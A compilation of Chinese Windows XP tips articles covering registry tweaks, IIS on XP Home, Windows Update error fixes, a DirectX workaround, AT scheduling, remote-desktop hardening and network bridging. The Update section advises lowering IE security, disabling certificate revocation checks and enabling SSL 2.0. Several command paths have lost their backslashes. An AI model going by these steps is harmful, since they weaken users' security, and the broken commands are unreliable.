    微软对文字服务的概念在Win XP中做了很大的扩充和发展，变成了“语言”的概念，就不仅仅是打字输入的概念了，而是通过各种手段（目前是文字，语音，和手写）来输入信息和指令。当然大多数情况下，人们还是习惯于仅仅使用文字输入的，一般用不上语音输入和手写，即使用手不方便的用户，用语音也是很费力的，它要占用很大的资源，而且语音识别的能力也不能让人恭维，但它展示了一种方向和趋势，也是Win XP作为（至少外观和功能上的）“化时代产品”的一个显著标志，所以在这里介绍一下，有兴趣的朋友可以去“尝鲜”一下。

    一般用户会设置不显示手写输入和语音输入的相关图标，所以在语言栏里，你看不到他们。要显示他们，只需点语言栏的右下角的一个向下的小箭头，然后在弹出的菜单中选择“任务栏中其他图片”这时，这些图标就会出现了——如果还没出现，那是因为相关的系统服务没开，可能是由于你因为要加快开机速度而在msconfig里对开机时启动的服务进行了“优化”，关掉了这些服务。

    以“手写输入”为例，手写输入有两种，一种是接一个外设，就是市场上在卖的那种，然后你可以象平时写字一样在电脑里写你的文字，还有一种是在电脑里用鼠标“写”的，这个有点象写字板，只是你写的字能够被计算机识别，然后变为正楷罢了，用鼠标写字可是很费力的喔，不过，如果你是打拼音的（现在大多数人是用这个），当你遇到一个生僻字，这个字你知道字形，但不知道字音时，这个“手写输入”还是一条不错地解决途径。

5[通知区域自定义，Alt＋tab更清晰]

    不活动的程序图标会被自动隐藏起来，给任务栏的其他图标和按钮腾出了空间，而且在属性里还可以设置哪些显示，哪些不显示——比如你装了一个防火墙软件，它的图标会一直在通知区域，你知道这一点，所以就不用它“通知”你了，这时就可以把它隐藏起来。方法如下，在任务栏右击选“属性”，在弹出的对话框里的“通知区域”中选“自定义”，在弹出另一个对话框，你可以任意设置了。

    还有Alt＋tab键（用来切换任务），也跟win2000不同了，不仅仅显示那些任务的图标，还显示这些任务的窗口的缩略图。这个也是有用的，比如你开了很多网页，在win2000中，你要切换网页时就可能分不清哪个网页是你要看的，有个这个功能，你就可以通过看图来辨认出你要看的网页了。(不同版本的情况有所不同）。

    6[清除 Win XP 共享文件夹]

    打开我的电脑，我们都会注意到有个“共享文件夹”，这个文件夹在我们使用工作组的时候蛮有用，你不用设置什么东西，直接把要共享的文件放到这个共享文件夹里就搞定了，但是实际应用中，很多人并不需要这个文件夹，有时就想把它干掉，但是怎么都找不到在那里设置，这时只有求救注册表了。 打开注册表编辑器（不要说不知道怎么打开啊，运行regedit就ok了）。 找到：
HKEY_LOCAL_MACHINE --> SOFTWARE --> Microsoft -->Windows--> CurrentVersion -->Explorer -->My Computer-->NameSpace --> DelegateFolders -->{59031a47-3f72-44a7-89c5-5595fe6b30ee} ,把这个项del掉就ok了，不过你先得备个奋，或者记下这个值，以后说不定你还会用到它呢。 7[保存搜索结果]
搜索是一个很浪费时间的过程，如果你对自己机器里资料的存放了如指掌，自然很少有用到搜索，但要是你要去公共机房，你要什么东西就常要搜索了，搜索可是很浪费时间的，所以有时你需要把搜索结果保存起来。在你键入你的搜索条件后，执行“立即搜索”。然后右键单击“搜索结果”面板(或选择“文件”菜单)，选择“保存搜索”，并在弹出的对话框中键入文件名和保存位置。以后每次想要运行同样的搜索，只需在资源管理器中找到该文件，然后双击，已保存的搜索标准会很方便地导入到“搜索结果”对话框的合适区域中，无需重复输入搜索标准即可进行搜索。这可是很省力的，还有要提醒大家，有时间研究一下Win XP的搜索助手，其实它的功能十分强大，平时我们都不太使用，但微软的coder们设计的时候可是贯注心力的，研究一下你可以更有效率地使用它，这里就不多说了。

7[任务栏显示快捷方式]

    你可以把你经常用的文件夹和程序拖到任务栏上创建一个快捷方式。你可以在D盘上新建一个文件夹，将其命名为“任务栏文件夹”，将你常用的文件夹和常用程序快捷方式都放到这个文件夹中，然后在任务栏上单击鼠标右键，选择“工具栏”→“新建工具栏”→“系统任务栏”，单击“确定”后，这个工具栏就出现在任务栏上了。在默认情况下，将显示新建工具栏的图标、文字和标题。但可以只让它显示图标，方法为在任务栏上右击 去掉“显示标题”、“显示文字”两项前面的小钩。

    8[去除Win XP的随标提示]

    为了用户使用方面，windows很早就有了提示，比如你的鼠标指到“开始”，它就会出现一个提示行：“单击这里开始”。这实际上是一个链接，我们使用时间长了就不需要它了，可是没有什么地方可是设置不显示提示，要知道这种提示都要占系统资源的，而我们并不需要这些提示，于是就到注册表编辑器里去搞定它：HKEY_CURRENT_USER-->Control PanelDesktop-->LameButton ,把它的键值改为0，然后注销一下（不行就重启），这些浪费资源的提示就没有了。


Win XP家庭版也用IIS

《一键清理系统垃圾》

Win XP家庭版也用IIS

    很多家庭用户电脑上安装的是Windows XP家庭版。与Windows XP专业版相比，Windows XP家庭版不支持双CPU、多国语言、EFS文件系统加密以及IIS(Internet Information Services)。因此，如果你想学习IIS，你会发现Windows XP家庭版根本不能安装IIS或者PWS。按照常规的做法，我们只能重新安装Windows XP专业版或者降级使用Windows 2000专业版，不过今天要和大家探讨的，是如何在Windows XP家庭版上成功地安装和使用IIS。

    步骤1

    首先我们需要准备一张Windows 2000的安装光盘，假设你的Windows XP家庭版安装在“C:\Windows”，启动记事本程序，在打开对话框中选择打开“C:\Windows\inf\sysoc.inf”，找到“[Components]”小节，并继续找到类似“iis=iis.dll,OcEntry,iis.inf,hide,7”的行，把这一行替换为“iis=iis2.dll,OcEntry,iis2.inf,,7”，之后保存文件。

    步骤2

    把Windows 2000专业版的光盘插入光驱，用Winrar打开光盘i386目录下的iis.dl_和iis.in_这两个CAB格式的文件，将解压缩得到的“iis.dll”改名为“iis2.dll”，复制到“C:\Windows\system32\setup\”目录下；将“iis.inf”改名为“iis2.inf”，复制到“C:\Windows\inf\”目录下。

    步骤3

    打开控制面板，单击“添加删除程序”图标，然后在窗口左侧导航栏上单击“添加/删除Windows组件”按钮，在打开的“Windows组件向导”中，选中“Internet信息服务(IIS)”前的复选框。单击右下角的“详细信息”按钮可以打开对话框，在该对话框中我们可以选择需要安装的IIS组件内容。选择完毕后单击“确定”按钮，退回到界面中再单击“下一步”，系统就会开始复制文件。

    提示：如果在安装过程中系统需要插入Windows XP CD，或者需要你提供“exch_adsiisex.dll”文件，那是因为你按照默认的选项安装了IIS。要解决这个问题，只要清空“SMTP Service”选项前的复选框即可。如果进入窗口中，“Internet信息服务(IIS)”选项无法选择，那么很可能因为你使用的“iis.dl_”和“iis.in_”是从Windows XP专业版中提取的，只要换成Windows 2000专业版中的这两个文件即可。

    步骤4

    安装结束后，你可以打开“控制面板→性能和选项→管理工具”查看“Internet信息服务管理”。再打开IE，在地址栏中输入“localhost”后回车，验证一下IIS是否正常运行。

    经过验证，WWW、FTP等几个服务经过这样的修改都可以在Windows XP家庭版上正常运行。不过经过这样处理安装的IIS在运行上可能存在某种未知的缺陷。


win XP任意自动更新法

《一键清理系统垃圾》

win XP任意自动更新法

        在下面的叙述中，均以将Windows安装到C盘为例，如果用户将Windows安装到了其他分区，请在相应的分区查找文中提到的文件夹及文件。

    我在使用Windows Update的时候，遇到“Cryptographic Service Error”错误，并提示“安装文件不能核实Update．inf，请确定系统已经启动Cryptographic服务。”

    解决方法：

    ①当安装SP1时候出现上述错误

    依次单击“开始→设置→控制面板→管理工具→服务”，在“服务”窗口的右侧找到“Cryptographic Services”选项，双击它打开“属性”窗口，将其“启动类型”设置为“自动”(如图所示)。需要注意的是，“Cryptographic Services”依赖“Remote Procedure Call (RPC) service”，如果你的RPC服务没有被启用该服务，那么你可以启用它。如果在“服务”窗口中无法启用，可以使用Windows XP安装光盘启动电脑，进入“故障恢复控制台”，输入命令“Enable RPCSS Service_Auto_Start”启用RPC服务。

    如果经过上述步骤没能解决问题，那么接下来就单击“开始→运行”，输入“cmd”后回车打开命令提示符窗口，依次运行下面三个命令：

    net stop cryptsvc

    ren c:windowssystem32catroot2 oldcatroot2

    net start cryptsvc

    如果仍然不行，我们还可以删除“c:windowssystem32catroot2”目录下的所有文件，如果系统提示不能被删除，则应该进入安全模式删除它。

    至此应该能够顺利升级了。怎么，还不行？那就下载微软专门为该问题发布的Q817287补丁吧！

    ②进行常规补丁更新的出错

    首先尝试上面的解决办法，如果问题还没有解决，单击“开始→运行”，输入“cmd”后回车打开命令提示符窗口，运行“net start cryptsvc” 命令，接下来使用regsvr32命令依次注册softpub.dll、wintrust.dll、initpki.dll、dssenh.dll、rsaenh.dl、gpkcsp.dll、sccbase.dll、slbcsp.dll、cryptdlg.dll。如注册softpub.dll的格式为：“regsvr32 softpub.dll”。

    我使用Windows Update的时候遇到“ERROR 643”或者“ERROR 126 The specified module could not be found”(找不到指定模块)

    解决方法：对“ERROR 643”，我们可以打开命令行提示符窗口，运行“del /q c:windowsSystem32Catroot2Edb.log”命令，即删除Edb.log这个记录了更新数据的文件，让系统重新建立，然后重新运行Windows Update。

    “ERROR 126”比较常见，我们可以打开WindowsSystem32catroot2目录，删除该目录下所有文件。如果还不奏效，可以从安装盘中复制Cryptui.dll、Certcli.dll替换WindowsSystem32下的同名文件。如果依然出现错误，使用“regsvr32 /u .dll”命令来卸载“故障2”中提到的那几个DLL文件，重新启动计算机后再再用“regsvr32 xxx.dll”命令重新注册它们。

    使用Windows Update的时候，遇到“0x800A138F”、 “0x800C－0008”、“0xC00CE55F ”等类似错误。

    解决方法：首先清空IE临时文件夹，然后查看浏览器的安全设置，为了更容易解决问题，暂时将其设置为最低级别。在IE中单击“选项→Internet选项”，然后在“Internet 属性”窗口中切换到“内容”选项卡，单击“清空SSL 状态”，选择“自动”完成，在弹出窗口中单击“清除表单”和“清除密码”。接下来切换到“高级”选项卡，确保选中“使用SSL 2.0”和“使用SSL 3.0”两项，清空“检查服务器证书吊销”选项。

    接下来检查你的系统时间设置是否正确，检查系统是否开启了443端口，删除C:program FilesWindowsupdate目录和C:Program FilesWindowsupdateV4目录下的所有文件。

    检查你的IE是否采用了128位数字加密，方法是在IE的“关于”窗口中查看，如果不是则需要重新安装IE。

    查看系统的Host文件，Host文件的位置是：C:WINDOWSSYSTEM32DRIVERSetc(Windows XP)、C:WINNTSYSTEM32DRIVERSetc(Windows 2000)、C:WindowsHosts(Windows 98)，查看里面是否有“Akamai”、“Microsoft”字样的行，如果有将该行删除。

    打开Windows Update后，在按下“立即安装”按钮，接受“用户协议”后，下载停滞。

    解决方法：打开C:Windowssystem32inf目录(注意该目录是隐藏目录)，找到IE.inf，右键单击该文件，选择“安装”。如果故障未能解决，到http://download.microsoft.com/download/msninvestor/patch/1.0/win98/en-us/mcrepair.exe下载该补丁。接下来复制C:WindowsSystem目录中的Asycfilt.dll、Oleaut32.dll、Olepro32.dll、Stdole2.tlb三个文件到C盘根目录中，运行下载的Mcrepair.exe文件，运行完毕重新启动电脑，将以上文件复制到C:WindowsSystem下覆盖同名文件。

    使用Windows Update的时候，突然断电，再次更新时提示已经下载补丁，无法更新。

    解决方法：Windows在更新时将临时文件放在C:WUTemp目录中，找到该目录后手动安装里面的补丁文件，安装完毕后再次利用Windows Update进行更新。如果故障无法解决，尝试将WUTemp目录删除，并删除C:Program FilesWindowsUpdatewuhistv3.log文件(该文件记录了Windows Update安装历史记录)，再次使用Windows Update更新即可。


Win XP使用经验二则

《一键清理系统垃圾》

Win XP使用经验二则

    一、在系统托盘区添加音量调节图标

    用户在安装Windows

XP后，会发现在系统托盘区找不到熟悉的音量调节图标，这对习惯使用Windows

XP系统音量调节方式来调整音量大小的朋友，会觉得很不方便。这时你只要单击"开始"－"控制面板"，在"控制面板"窗口双击"声音和音频设备"图标，在"音量"标签卡下，将"将音量图标放入任务栏"复选框选中，点击"确定"按钮即可在系统托盘区添加音量调节图标。

    二、修改环境变量避免程序安装失败

    用户在Windows

XP系统中安装某些应用程序时，会出现系统找不到路径的错误，从而导致安装失败。

    造成这种情况的主要原因在于，Windows XP系统支持多用户操作，并且支持中文方式的用户名称，在Windows

XP中，不同用户的用户变量默认方式为"Windows XP系统安装目录:\Documents and

Settings\用户名\LocalSettings\Temp"，如笔者采用的用户名为"周进"，那么所用的用户变量就是"D:\Documents and

Settings\周进\Local

Settings\Temp"；一般情况下，当运行应用软件的安装程序时，安装程序会将文件解压缩到这个目录中，但是由于部分安装程序对包含有中文名称的路径方式不支持或支持不好，如果用户在Windows

XP系统中建立了中文方式的用户名称，那么安装程序就会出现如图所示的找不到路径的错误。

    既然存在有安装程序不支持中文方式的路径的情况，那么我们就将用户的用户变量方式修改为不包括中文方式的目录即可避免此问题发生。

    具体的修改方法是：

    单击"开始"菜单，在"我的电脑"图标上单击鼠标右键，从右键菜单中选择"属性"命令，打开"系统属性"对话窗口，单击"高级"标签卡，在"高级"设置页面中单击"环境变量"，进入"环境变量"设置窗口，此时可以看到在窗口上方的"用户的用户变量"列表框中显示了用户变量TEMP和TMP的设置情况，用户可在此单击"编辑"按钮对TEMP和TMP的变量值进行修改，将变量值由"%USERPROFILE%\Local

Settings\Temp"改为"D:\Temp"，修改完成后单击"确定"按钮退出。重新启动Windows

XP系统即可应用修改后的环境变量，此时当你再次运行安装程序时就不会出现图中所示的找不到路径的错误了。


Win XP无法安装DX9的解决方法

《一键清理系统垃圾》

Win XP无法安装DX9的解决方法

    想必很多朋友都使用过一份被称为VLK（上海大客户）版的WindowsXP操作系统，大家之所以选择它无非是看中集成的SP2、DirectX 9.0b（以下简称DX 9.0b）、免激活以及性能方面的优化等等，可就是这份看起来完美无缺的XP版本却因为微软发布DirectX 9.0c才暴露了一个小问题，故事还得从笔者上次帮朋友重装系统讲起…… 　　有一次，笔者的一位朋友电脑出了点问题，请笔者过去看看，当时看到电脑里软件有些老，笔者就用自己一直在用的VLK版WinXP帮朋友重装了一遍系统。随后的日子一直平安无事，可天生喜好汽车的朋友那天忽然买来了一张《极品飞车8》，却无论如何也装不上，这才给笔者打了电话……

    友：“喂，是宏伟吗？”

    我：“哦，老张吧？有什么事儿吗？”

    友：“是这样，昨天我买了一张《极品飞车8》，可就是装不上，装完了一双击总提示缺XXX文件”

    我：“缺文件？是不是软件有问题啊？”

    友：“应该没事儿吧，我当时也拿不准，就让同事在别的电脑上装了一下，挺正常的，那台机器配置还没我的高呢”

    [旁] 笔者平时几乎不玩游戏，所以一遇到游戏问题就有点发懵，只会按一般的思路去想，请各位游戏高手们不要见笑

    我：“配置没有家里的高，该不会装的是98吧？那台机器是什么系统啊？”

    [旁] 其实此时想想也不太像是系统不支持，这么新的游戏，运行平台肯定支持XP，而且这套XP的组件版本都很高，朋友的机器配置也不低，但此时必须将所有可能出现的问题都比较一下

    友：“和家里的一样，也是XP，以前我们单位的电脑也是他帮忙装的”

    [旁] 3D游戏都需要DirectX支持，这么新的游戏该配合哪个版本的DirectX呢？会不会比集成的9.0b还要高呢

    我：“对了，你看看游戏的安装说明里有没有DirectX的版本要求？”

    友：赶忙翻阅……“有，有，是DirectX 9.0c，不过这个也装过了。”

    我：心想，看来电话里是搞不定了，没准又是系统故障，还是实地看一下吧，反正当时留了一个Ghost备份，于是就和朋友说“这样吧，老张，明天正好礼拜六，你要是上午没事，我去你那儿看一下，要不电话里也讲不清。”

    友：“行，明天我正好没事儿，就在家等你了。”

    第二天上午，我如约到了朋友家里。经过一番检查和调试，确认了不是因为系统缺少文件才出现的问题，但却发现了一个奇怪的现象，这就是每次升级安装DX9.0c时，总看不到像其他版本DX升级那样的文件复制过程，反之，安装速度非常快，不到2秒钟就完了，随后就出现如图1的完成对话框。而通过在“开始”菜单→“运行”栏中输入“dxdiag”调出DirectX诊断程序进行检测，也证实了我的猜测 —— 当前的DirectX版本仍为9.0b，9.0c并未安装成功。如图2所示

图1

图2

    【小提示】

    DirectX是微软的一个3D函数库，它的版本随着不断加入新的3D函数而增加，最新的版本是9.0c。每款3D游戏在编写时，都可以直接调用DirectX里的函数简化编制过程，降低游戏大小，并实现各种漂亮的3D效果而不用再劳心费力地自行编制。这也意味着，如果某游戏开发时使用了DirectX 9.0c里的函数，那么要求玩家安装游戏时也要在自己电脑里装上DirectX 9.0c，否则游戏将无法正常调用相应函数实现预设的3D效果

    这样看来，游戏提示缺文件的故障很可能出在DirectX 9.0c上，而回忆上次朋友在电话里描述的安装过程，估计就是看到了图1的提示才说的。可由于自己平时不怎么玩游戏，家里的电脑没有升级到9.0c，自然也就没注意这个问题。那天恰巧朋友的机器是双系统，还有一个Win98。笔者连忙进入98升级安装了DirectX 9.0c，一切都很顺利，装上DX9.0c的Win98玩起《极品飞车8》来自然毫无问题。这样看来，真正的问题不是出在这版WinXP上，就是由于DX设计的问题 —— 9.0b无法正常升级为9.0c。由于朋友家条件不足，无法继续测试，我就将朋友的《极飞8》光盘借回家里慢慢研究。　　经过反复试验，确定了在Win98下DX9.0b是完全可以正常升级为9.0c的，也就肯定了是由于这版XP造成了这个故障，难道就为了一个游戏再重新更换一套操作系统吗？当然不用，由于DirectX 9.0c的安装包里有两个程序（dsetup32.dll和dsetup.dll）负责在每次安装前检测系统的DX版本，如果与自己的版本相同或更高就不继续安装，但不知为何它无法正确检测这版WinXP的DX版本，所以才出现了图1的画面。而我也就将计就计地骗了XP一下，将DirectX 9.0c中的这两个文件替换为9.0b的，这样安装程序就能正常检测安装了。原版与修改版的区别如图3和图4所示

图3

图4

    改造过的DX 9.0c安装程序终于不负众望，成功在VLK版WindowsXP上安装上了DirectX 9.0c，最后用Dxdiag的检查结果也如图5所示正确地标识为9.0c了。

图5

    【写在最后】

    笔者也曾试过用第三方软件修改系统中DX的当前版本号以达到安装的目的，但都没有成功，鉴于这个问题涉及的知识非常广泛，而且很可能是SP2集成时出现的问题，因此也就无法再进行深入研究了，希望此文能给同样使用VLK版WindowsXP并同样困惑着的朋友们提供一个方法，同时愿意与大家进一步交流其它的安装方法。

作者：任宏伟
来源：天极yesky


WIN XP系统内置的AT命令

《一键清理系统垃圾》

WIN XP系统内置的AT命令

  AT命令是Windows XP中内置的命令，它也可以媲美Windows中的“计划任务”，而且在计划的安排、任务的管理、工作事务的处理方面，AT命令具有更强大更神通的功能。AT命令可在指定时间和日期、在指定计算机上运行命令和程序。
    我们可以在“开始→运行”中输入AT命令，下面就来看看AT命令的一些实例分析。
    1、定时关机
    命令：at 21:00 ShutDown –S –T30
    该命令运行后，到了21:00点，电脑会出现“系统关机”对话框，并默认30秒延时自动关机。
    2、定时提醒
    命令：at 12:00 Net Send 10.10.36
    .122与朋友约会的时间到了，快点准备出发吧!
    其中Net Send是Windows内部程序，可以发送消息到网络上的其他用户、计算机。10.10.36.122是本机电脑的IP地址。这个功能在Windows中也称作“信使服务”。
    3、自动运行批处理文件
    如果公司的数据佷重要，要求在指定的日期/时间进行备份，那么运行：
    命令：at 1:00AM /Every:Saturday My_BackUp.bat
    这样，在每个Saturday（周六）的早上1:00点，电脑定时启动My_BackUp.bat批处理文件。My_BackUp.bat是一个你自行编制的批处理文件，它包含能对系统进行数据完全备份的多条命令。
    4、取消已经安排的计划
    命令：at 5 /Delete
    有时候，你已经安排好的计划可能临时变动，这样你可以及时地用上述命令删除该计划（5为指派给已计划命令的标识编号），当然，删除该计划后，可以重新安排。 （山东 张兆贵）


Win XP远程控制时保证安全必读

《一键清理系统垃圾》

Win XP远程控制时保证安全必读

跟其他远程控制技术类似，远程协助和远程桌面同样要在使用前考虑好安全问题。对于最高级别的安全要求，根本不建议在实际应用中使用远程控制技术，不过要明白这种技术也能给用户带来便利。本章会就使用远程控制技术时保证安全性的方法进行说明。
    远程协助
    远程协助（RA，Remote Assistance）技术允许用户（邀请者）通过网络邀请其他人（受邀者）通过完了过解决自己遇到的实际问题。使用这种方法受邀者可以查看邀请者的计算机屏幕并且互交流信息，同时，如果邀请者允许，受邀者还可以通过网络操作邀请者的计算机直接解决问题。邀请者可以决定受邀者的权限到底是仅屏幕查看还是具有控制权。要使用远程协助，双方都需要使用Windows XP操作系统。
    远程协助可以由邀请者发起，这叫请求远程协助；同时也可以由受邀者为邀请者提供远程协助，这叫提供远程协助。HelpAssistant账户就是给远程协助操作准备的，这个账户是在安装系统过程中创建的，并被随意分配一个复杂的密码，随后被禁用。当远程协助邀请打开时，用户的电脑上会创建一个“邀请者”的票证，同时3389端口也会打开，并允许到终端服务的访问，这时HelpAssistant账户会被自动启用。启用后受邀者可以使用这个账户和创建的票证访问邀请者的计算机。如果所有的票证都被关闭或者过期，HelpAssistant账户会被再次自动被禁用，3389端口也会同时关闭。
    注意：远程桌面功能也使用了终端服务，因此如果远程桌面功能被启用后，3389端口可能会一直打开。
    请求方式的远程协助
    用户可以通过电子邮件或者Windows Messenger请求远程协助，或者把远程协助的请求保存为一个文件。目前还没办法限制初学者邀请人，任何人只要能物理上连接到初学者的计算机就可以接受他的邀请。当一个远程协助请求被答应后，初学者就可以看到专家的用户名。然而，唯一能确定连接来的用户是正确用户的方法是使用密码。初学者在创建一个协助请求时可以选择用密码保护这个协助，密码并不包含在请求文件中，而且受邀者必须输入正确的密码才能建立连接，密码可以由初学者通过其他方法发给受邀者。不过，密码复杂性、密码策略还有账户锁定策略等规则都不对这个密码和账户生效。
    通过Windows Messenger发送的邀请是通过明文的方式以XML格式发送的，通过email形式发送或者保存的邀请文件是以MsRcIncident格式的文件发送的，这也是一种明文的XML格式。因此任何人只要能接触到这些数据就都能读出其中的内容，例如机器的IP地址、所使用的端口号以及邀请者是否设置了密码保护。
    基于这些原因，对于安全要求比较严格的网络中，不建议使用远程协助。

提供方式远程协助
    提供远程协助通常被认为是对邀请者提供远程协助更加安全的做法。提供远程协助仅适用于位于同一个域中或者被信任的域中的两台计算机之间，并且通过设置允许用户提供远程协助。当使用这个功能时，专家不能在没有声明的情况下连接到用户的计算机，或者在没有从用户处获得权限的情况下控制计算机。同时用户也有允许或者拒绝对方连接的能力。
    要使用这种方式的远程协助，安全配置模板的用户权限部分必须做如下修改：
用户权限 建议设置
允许通过终端服务登录
决定哪些用户或者用户组具有作为终端服务客户端登录的能力，远程桌面用户需要这个权限。如果同时还使用了远程协助功能，应只有使用该功能的管理员具有这个权限。注意：如果要使用提供方式的远程协助，则不用往该设置中添加任何用户或者用户组。
拒绝通过终端服务登录决定哪些用户或者用户组被禁止作为终端服务客户端登录，这个权限是为远程桌面用户使用的。
    除此之外，为了允许用户使用提供方式的远程协助，还需要设置以下几个组策略：
    在MMC的组策略组件中打开GPO或者通过容器的属性-组策略选项卡访问GPO的链接
    如果是通过组策略选项卡访问，高亮选择目标GPO然后点击编辑以访问组策略组件
    定位到计算机配置\管理模板\系统\远程协助节点
    双击右侧面版的请求远程协助
    点击已启用按钮，以允许用户请求远程协助
    从下拉菜单中选择“只允许帮助者查看此计算机”选项
    设置最长票证时间（值）为0以及最长票证时间（单位）为分钟
    应用设置，关闭对话框
    注意：为了使用提供方式的远程协助，其用请求远程协助策略是必要的，然而，设置最长票证时间为0可以防止用户使用请求远程协助功能。
    双击右侧面版的提供远程协助功能
    如果你打算允许专家在这台计算机上提供远程协助，点击启用按钮
    在下拉菜单中选择“仅允许帮助者查看此计算机”
    警告：建议你永远不要允许用户给与其他人远程控制计算机的权限，尽管用户可以看到对方的操作以及随时可以收回控制权，因为要破坏一个系统治需要几秒钟就够了。
    点击帮助者：显示…按钮并且把所有被允许对这台计算机提供远程协助的用户全部添加近来，例如有管理员，以及桌面帮助人员等。建议限制本功能仅对确实需要的用户开放。用户可以以以下的格式显示：
\或\
    远程桌面连接
    远程桌面（RD，Remote Desktop）是用在Windows XP Professional上的另一种优先功能的终端服务，它允许用户从远程连接到本机，并且像直接使用那样使用本机的各种资源。Windows XP Professional系统中默认情况下远程桌面功能是被禁用的。
    远程桌面连接是使用远程桌面客户端软件进行的，XP系统中已经默认安装了该软件，并且Microsoft Windows 2000、NT、Windows 98和Windows 95的客户端软件也已经包含在了Windows XP中。远程桌面还有一个基于ActiveX的客户端，叫做RWDC（Remote Desktop Web Connection），可以被安装到IIS服务器上。使用RDWC，任何计算机都可以通过使用支持ActiveX的浏览器连接到适当的网页，下载ActiveX客户端，然后打开远程桌面连接。当向XP Professional系统安装IIS时，RWDC会被默认安装。
    当远程桌面被启用后，3389端口被打开以接受终端服务的访问。所有的管理员（本机的和域中的）以及在“远程桌面用户”中被列出的用户和用户组都可以远程访问该计算机。当连接被启用后，被连接的计算机将会被自动锁定，如果目标计算机上已经有用户登录，远程的用户将会看到一个选项，可以把目标计算机上本地登录的用户注销，然后从远程登录上去，但这需要远程用户已经被成功验证，并且需要具有管理员权限。 　　远程桌面使用标准的Windows验证机制，因此密码策略和账户锁定策略也可以被应用到远程桌面，所有用于远程桌面的账户都必须设置有密码。
    注意：建议在使用远程桌面的过程中锁定默认的administrator账户并禁止该账户从远程登录，不过本地登录是不受此限制的。
    要使用远程桌面功能，安全模板中的用户权限部分必须做如下改变：

用户权限 建议设置
允许通过终端服务登录
决定哪些用户或者用户组具有通过终端服务客户端登录的权限，远程桌面用户需要该权限，如果同时使用了远程协助功能，应只有使用此功能的管理员具有该权限。 Administrators、Remote Desktop Users
拒绝通过终端服务登录决定哪些用户或者用户组没有通过终端服务客户端登录的权限，该权限是为远程桌面用户准备的。
    要允许计算机接受远程桌面连接，可以采取以下操作：
    在我的电脑上点击鼠标右键，并选择属性以打开系统属性对话框
    在对话框中打开远程选项卡
    选中允许用户远程连接到这台计算机复选框
    点击选择远程用户…按钮打开远程桌面用户对话框
    本局本地策略的定义添加相应的用户或者用户组
    注意：该操作会把被选中的用户和用户组添加到本地Remote Desktop Users用户组中，可以通过本地计算机管理工具直接对加入该组的用户和用户组进行编辑。
组策略-管理模板
    Terminal Services
    除了上面指出的一些设置之外，还建议对终端服务进行如下设置，并同样作为GPO的一部分或者通过本地计算机配置应用到计算机上。
    这些对终端服务的建议设置都位于GPO的计算机配置\管理模板\Windows组件\终端服务节点下，并可以通过MMC的组策略组件访问。终端服务设置同样可以在用户设置节点下找到，不过那里的设置会被计算机配置下的设置覆盖。

网络配置建议
    远程协助和远程桌面都使用了终端服务使得用户可以远程访问本地计算机，在Windows XP系统中使用这些功能时，终端服务使用了3389端口。强烈建议通过设置仅允许本地局域网使用远程连接功能，并且在对外防火墙或者路由器上封掉3389端口。在该端口上所有的入站和出站连接都必须被阻止以禁止非法访问。如果仅阻止了入站连接，远程协助功能还是有可能通过Windows Messenger与局域网外部使用，因此双向的通讯都要被阻止。
    如果需要从本地局域网那个外使用远程协助或远程桌面连接，建议在防火墙或者路由器上设置过滤，以确保只有特定的IP地址可以当问到局域网内的系统。其他所有地址到3389端口的访问都应当被禁止。如果需要更高安全级别的保护，可以安装一个VPN服务器，并使用非常强的验证方式使得少数用户可以拨入到VPN服务器。当然仅允许特定的IP地址可以连接到VPN服务器也是个好方法。


Win XP中的网桥

《一键清理系统垃圾》

Win XP中的网桥

2002-02-19　　　 作者：

    网桥，这个名词听起来好像既熟悉又陌生，它到底是什么呢？其实网桥是一种连接局域网 (LAN) 段的廉价而便捷的方法。若要了解网桥如何工作，则需要首先了解 LAN 段。LAN 段是连接计算机的网络媒体的单个部分。例如，假设您有三台计算机：计算机 A、计算机 B 和计算机 C。计算机 A 有两个以太网卡，而计算机 B 和 C 各有一个以太网卡。连接 A 和 B 的以太网电缆将创建一个 LAN 段。另一个连接 A 和 C 的以太网电缆将创建另一个 LAN 段。

    传统上，如果您需要网络具有多个段，则您有两个选择：路由和桥接。IP 路由是连接网络段的常用解决方案。但是，若要安装 IP 路由，则需要购买硬件路由器或在段之间的交接处安装计算机以用作路由器。对于每个网络段上的每台计算机而言，IP 路由都要求对 IP 寻址进行复杂配置，而且每个网络段都需要配置为独立的子网。IP 路由是适合于大型网络的解决方案，此时可缩放性很重要，而且需要经验丰富的人员配置和维护网络。硬件桥接解决方案不一定像 IP 路由一样进行复杂配置，但是它需要购买额外的硬件桥。如果是家庭或小型办公网络，则这两个选择都不理想，您既不愿意购买昂贵的搭桥硬件，也不愿意请有经验的人员管理 IP 路由网络。

    相反，网桥允许通过选择适当的网络连接图标并单击"桥接"，连接 LAN 段。相似的按钮允许您启用桥并将连接添加到该桥。网桥管理整个网络的 LAN 段并创建单个子网。不需要进行配置，不需要购买额外的硬件（如路由器或桥）。在单个子网 IP 网络中，IP 寻址、地址分配和名称解析将被高度简化。

    网桥可以在不同类型的网络媒体之间创建连接。在传统网络中，如果使用混合媒体类型，则每种媒体都需要一个单独子网，而且需要在多个网络子网间进行数据包转发。因为不同的媒体类型要使用不同的协议，所以需要进行数据包转发。"网桥"自动进行所需的配置，以将信息从一种媒体类型转发到另一种类型。

    Windows XP 计算机上只能存在一个桥，但可以使用它来桥接所有计算机实际允许的网络连接。
"网桥"使用 IEEE 跨越树算法 (STA) 建立无循环转发拓扑。当已搭桥网络中存在多条路径时，循环可以形成，而且桥的简单转发规则将导致转发风暴，即同一帧将从一条桥到另一条桥进行无止境的中继。STA 提供自动机制以便在必要时选择性地禁用单个端口上的桥转发，以确保转发拓扑是非循环的。对于跨越树算法而言，不必配置网桥。

    说了那么多，那么到底普通用户如何安装并设置和使用网桥呢，下面请听我详细道来：

    一、创建网桥：

    1．打开"网络连接"（ 要打开"网络连接"，请单击"开始"，指向"设置"，然后双击"控制面板"，单击"网络和 Internet 连接"，然后单击"网络连接"）。
    2．在"LAN 或高速 Internet"下，选择要将其作为桥的各个部分的每个专用网络连接。
    3．右键单击突出显示的专用网络连接之一，然后单击"桥接"。

    二、将连接添加到网桥

    1．打开" 网络连接"。
    2．在"网桥"下，右键单击"网桥"，然后单击"属性"。
    3.在"常规"选项卡的"适配器"下，选择要添加到桥的每个适配器的复选框，然后单击"确定"。

    三、启用或禁用网桥

    1．打开 网络连接。
    2．在"网桥"下，右键单击"网桥"，然后选择下面的一项操作：
    3．若要启用"网桥"，请单击"启用"。
    4．若要禁用"网桥"，请单击"禁用"。

四、从网桥删除连接

    1．打开 网络连接。
    2．在"网桥"下，右键单击"网桥"，然后单击"属性"。
